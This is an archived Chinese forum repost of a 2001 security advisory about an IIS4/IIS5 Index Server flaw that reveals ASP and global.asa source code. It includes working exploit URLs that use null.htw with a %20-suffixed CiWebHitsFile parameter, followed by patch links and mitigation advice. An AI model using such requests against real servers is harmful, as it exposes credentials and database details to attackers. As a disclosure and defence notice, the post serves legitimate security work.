精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>编程开发>>● ASP>>参考文档>>IIS4和IIS5泄漏asp等文件源代码的重大漏洞

主题:IIS4和IIS5泄漏asp等文件源代码的重大漏洞
发信人: xiaodo(我一个人)
整理人: qcrsoft(2001-12-23 00:47:45), 站内信件
IIS4和IIS5泄漏asp等文件源代码的重大漏洞 
发布于:2001-12-14 
—安全动态——IIS4和IIS5泄漏asp等文件源代码的漏洞

  Cerberus安全组织发现了微软Index Server的第三个可以察看asp源代码和其它页面的漏洞。包括运行IIS4或者IIS5的Index Server,甚至以及添打了最近关于参看源代码的补丁程序的系统,或者更不没有.htw文件的系统,一样存在该问题。获得asp程序,甚至global.asa文件的源代码,无疑对系统是一个非常重大的安全隐患。
往往这些代码中包含了用户密码和ID,以及数据库的源路径和名称等等。这对于攻击者收集系统信息,方面下一步的入侵都是非常重要的。
通过构建下面的特殊程序可以参看该程序源代码:
http://www.victim.com/null.htw?
CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full
这样只是返回一些html格式的文件代码,但是当你添加%20到CiWebHitsFile的参数后面,如下:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp%
20&CiRestriction=none&CiHiliteType=Full
这将获得该程序的源代码。
(注意:/default.asp是以web的根开始计算。如某站点的
http://www.victim.com/welcome/welcome.asp
那么对应就是:
http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp%
20&CiRestriction=none&CiHiliteType=Full)
由于'null.htw'文件并非真正的系统映射文件,所以只是一个储存在系统内存中的虚拟文件。哪怕你已经从你的系统中删除了所有的真实的.htw文件,但是由于对
null.htw文件的请求默认是由webhits.dll来处理。所以,IIS仍然收到该漏洞的威胁。
建议解决方法:
如果该webhits提供的功能是系统必须的,请下载相应的补丁程序。
如果没必要,请用IIS的MMC管理工具简单移除.htw的映象文件。
相关信息可以参看下面链接:
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
补丁程序如下:
Index Server 2.0:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
  

[关闭][返回]